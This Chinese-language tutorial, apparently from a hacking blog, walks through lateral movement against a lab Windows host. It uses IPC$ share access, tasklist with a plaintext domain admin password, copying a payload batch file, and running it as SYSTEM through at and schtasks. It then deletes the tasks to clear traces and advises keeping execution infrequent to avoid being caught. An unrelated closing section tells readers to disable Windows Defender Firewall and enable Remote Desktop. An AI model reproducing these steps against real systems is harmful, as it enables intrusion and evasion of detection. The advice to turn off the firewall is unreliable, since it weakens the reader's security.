远程命令：

dir命令

查看远程主机的C盘文件

dir \\192.168.160.135\C$

去 192.168.160.135 主机上查看一下C盘。

tasklist命令

查看远程主机上运行的进程

tasklist /S 192.168.160.135 /U HACKBIJI\Administrator /P W2ngluoanquan

2、at计划任务

at命令使用

at是windows自带的用于创建计划任务的命令，使用at命令可以在远程目标上创建计划任务，建立定时任务四部曲如下：

使用net time 命令确定远程机器当前的系统时间

使用copy命令将payload文件复制到远程目标机器中

使用at命令定时启动该payload文件

删除使用at命令创建计划任务的记录

步骤一：使用net time 命令确定远程机器当前的系统时间

net time \\192.168.160.135

步骤二：使用copy命令将payload文件复制到远程目标机器中

copy calc.bat \\192.168.160.135\c$

步骤三：使用at命令定时启动该payload文件

在下午5点49分启动calc.bat批批处理任务

at \\192.168.160.135 17:49:00 c:\calc.bat

到点后，查看到出现了calc.exe进程，成功植入了定时任务，卡的要死。一定要控制好执行频率，否则肯定会被抓的。

步骤四：删除使用at命令创建计划任务的记录

黑客完成目的之后要清楚痕迹，所以要删除计划任务。

at \\192.168.160.135 2 /delete

3、schtasks计划任务

schtasks命令比at命令更加强大、灵活。创建计划任务，该计划任务在开机时启动，运行c盘下的calc.bat批处理任务，运行权限是system。

schtasks /create /s 192.168.160.135 /tn ailx10_task /sc onstart /tr c:\calc.bat /ru system /f /u HACKBIJI\Administrator /p W2ngluoanquan

尝试立即运行这个计划任务，然后再次查看发现新增了一个calc.exe进程

schtasks /run /s 192.168.160.135 /i /tn "ailx10_task" /u HACKBIJI\Administrator /p W2ngluoanquan

最后删除计划任务

schtasks /delete /s 192.168.160.135 /tn "ailx10_task" /f /U HACKBIJI\Administrator /P W2ngluoanquan

/u 域账号

/p 密码

/f 强制执行

最后的最后，删除$ipc，结束战斗～

net use \\192.168.160.135\ipc$ /del /y

解决方法：

1、在电脑搜索中输入并打开【控制面板】，点击【系统和安全】-【Windows Defender防火墙】。

2、选择左侧栏目的【启用或关闭防火墙】，就能够查看到电脑的防火墙状态。

3、如果防火墙是启动状态，那么把它改为“关闭”即可。

4、把鼠标定位在【此电脑】，右键点击后选择【属性】，点击【高级系统设置】。如果页面没有直接显示这个选项，可以通过搜索找到这个功能。

5、点击【远程】，勾选“允许远程连接到此计算机”，这样就打开了电脑远程连接的功能。

6、在桌面上按下快捷键“Win+R”，就会弹出【运行搜索框】，在搜索框输入“services.msc”。

7、点击“确定”后，就会出现【服务】窗口，在右侧的“服务”列表中找到“Remote Desktop Services”，右键点击后选择【启动】。这样就完成了电脑远程桌面连接的功能设置。